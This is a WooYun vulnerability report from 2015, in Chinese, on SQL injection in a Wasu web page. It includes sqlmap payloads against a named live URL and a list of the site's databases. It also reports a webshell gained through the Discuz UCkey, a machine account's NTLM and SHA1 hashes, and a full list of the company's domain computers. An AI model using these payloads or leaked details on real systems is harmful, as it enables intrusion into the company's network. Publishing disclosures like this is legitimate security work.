华数某站SQL注入涉及21裤(已shell可进行域渗透)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150606

漏洞标题：华数某站SQL注入涉及21裤(已shell可进行域渗透)

漏洞作者： mango

提交时间：2015-10-30 14:04

修复时间：2015-12-14 18:00

公开时间：2015-12-14 18:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-30：细节已通知厂商并且等待厂商处理中
2015-10-30：厂商已经确认，细节仅向厂商公开
2015-11-09：细节向核心白帽子及相关领域专家公开
2015-11-19：细节向普通白帽子公开
2015-11-29：细节向实习白帽子公开
2015-12-14：细节向公众公开

简要描述：

~~~~

详细说明：

http://os.wasu.cn/mp/mp.php?id=330

sqlmap identified the following injection points with a total of 93 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=330 AND 5132=5132
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=330 AND (SELECT * FROM (SELECT(SLEEP(5)))msCa)
---
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=330 AND 5132=5132
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=330 AND (SELECT * FROM (SELECT(SLEEP(5)))msCa)
---
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
available databases [21]:
[*] `lt-dx`
[*] adbbs
[*] bbsx
[*] computer
[*] disk
[*] ftp
[*] information_schema
[*] jdhwx
[*] ks
[*] main
[*] mysql
[*] new
[*] qyks
[*] softdown
[*] tj
[*] ucenter
[*] uchome
[*] wjhy
[*] yuangong
[*] zzynetdisk
[*] zzysupesite

adbbs 跑出管理员密码因为是DZ 2.5 使用UCkey 直接进行getshell

漏洞证明：

进行抓密码~~~

[00000002] Primary
	 * Username : WWWOS$
	 * Domain   : WASU
	 * NTLM     : a8b75cb78bf35729ee365d3bf3e039f9
	 * SHA1     : d9607a36d353b266f83ffd653df0597855d8703c
注释     加入到域中的所有工作站和服务器
成员
-------------------------------------------------------------------------------
BEIJIN-ORACLE$           BEIJIN-WEB$              BES2010R3$               
CLUSTER-CA-1$            CLUSTER-CA-2$            CLUSTER-CA-3$            
CMWL-YYGL-315$           CM-YYGL-1$               CX-VPN$                  
DC3$                     DC-CHANGPWD$             FTP$                     
HL-VPN$                  HP-VCENTER$              JHZJ-WIN2008$            
JW-JF2$                  JW-W1$                   JWWORK-UNDER$            
KFFD$                    MANAGERLINK$             MOSS-APP$                
MOSS-APP1$               MOSS-APP2$               MOSS-SEARCH$             
MOSS-SQL2008$            MOSSWEB$                 MOSS-WEB1$               
MOSS-WEB2$               NOD321$                  NOD322$                  
openfiler$               SANFOR-SMS-1$            SANFOR-TOOLS$            
SANGFOR-LOG$             SQL2012$                 SQLSERVER$               
TMG$                     VCENTER5$                VCENTER51$               
VCENTER55$               VCENTER55VCUM$           VIEW-THINAPP$            
VINTENTORY51$            VMVIEW51$                VMVIEW51S$               
VM-VIEW5-S$              VMVIEWCOMPOSER$          VMWARE-SQL$              
VMWARE-VCSA$             VMWARE-VCUM$             VSSOS51$                 
WASU-001$                WASU-003$                WASU-BLJ$                
WASU-BLJ-SELF$           WASU-CG$                 WASU-DHCP$               
WASU-DNS$                WASU-JT-DAGL$            WASU-KMS$                
WASU-SCCM$               WASU-SMS-1$              WASU-SQL2000$            
WASU-VM-BACKUP$          WASU-VPN1$               WASU-WORKFLOW$           
WASU-YKT$                WASU-YKT-RSQL$           WASU-YKT-RWEB$           
WASU-YYT-PDJH$           WIN2003$                 WIN2008-LOG$             
WSUS$                    WWWOS$                   ZZYWK$                   
命令成功完成。
 
D:\APMServ5.2.6\www\htdocs\os.wasu.cn\adbbs\config\> hostname
wwwos

在域内(可能是域管)~~~开下代理应该能进行域渗透~

修复方案：

~~彻底审查SQL注入~

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-10-30 17:58

厂商回复：

正在处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150606

漏洞标题：华数某站SQL注入涉及21裤(已shell可进行域渗透)

相关厂商：华数数字电视传媒集团有限公司

漏洞作者： mango

提交时间：2015-10-30 14:04

修复时间：2015-12-14 18:00

公开时间：2015-12-14 18:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150606

漏洞标题：华数某站SQL注入涉及21裤(已shell可进行域渗透)

相关厂商：华数数字电视传媒集团有限公司

漏洞作者： mango

提交时间：2015-10-30 14:04

修复时间：2015-12-14 18:00

公开时间：2015-12-14 18:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0150606"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：